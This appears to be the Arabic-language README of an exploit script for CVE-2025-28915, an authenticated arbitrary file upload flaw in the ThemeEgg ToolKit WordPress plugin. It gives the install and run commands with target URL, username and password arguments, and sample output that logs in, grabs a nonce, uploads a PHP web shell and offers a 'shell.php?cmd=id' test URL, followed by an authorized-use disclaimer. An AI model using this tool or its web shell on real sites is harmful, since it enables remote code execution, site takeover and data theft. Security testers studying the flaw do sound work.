
إضافة ThemeEgg ToolKit لووردبريس <= 1.2.9 - ثغرة رفع ملفات تعسفية
ثغرة رفع ملفات غير مقيد في إضافة ThemeEgg ToolKit لووردبريس (الإصدارات ≤ 1.2.9) تسمح للمهاجمين المصادق عليهم برفع قذائف ويب إلى الخادم. يمكن أن يؤدي ذلك إلى تنفيذ تعليمات برمجية عن بُعد (RCE)، والاستيلاء الكامل على الموقع، وتسريب البيانات الحساسة.
يقوم هذا السكريبت بأتمتة استغلال CVE-2025-28915 من خلال:
requests, beautifulsoup4pip install requests beautifulsoup4
python CVE-2025-28915.py -u http://192.168.100.74:888/wordpress -un admin -p password123
| الوسيطة | الوصف |
|---|---|
-u | عنوان URL المستهدف لووردبريس (مثل http://target.com/wordpress) |
-un | اسم مستخدم ووردبريس |
-p | كلمة مرور ووردبريس |
[+] Vulnerable version detected: 1.2.9
[+] Logged in successfully.
[+] Found security nonce: f82467a997
[*] Uploading Web Shell...
[+] Web Shell uploaded successfully!
[+] Potential Web Shell location: http://target.com/wp-content/uploads/2025/03/shell.php
[*] Test command: http://target.com/wp-content/uploads/2025/03/shell.php?cmd=id
هذا السكريبت مخصص للأغراض التعليمية واختبار الأمان المصرح به فقط. الاستخدام غير المصرح به غير قانوني وغير أخلاقي. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.
بواسطة: Khaled Alenazi (Nxploit)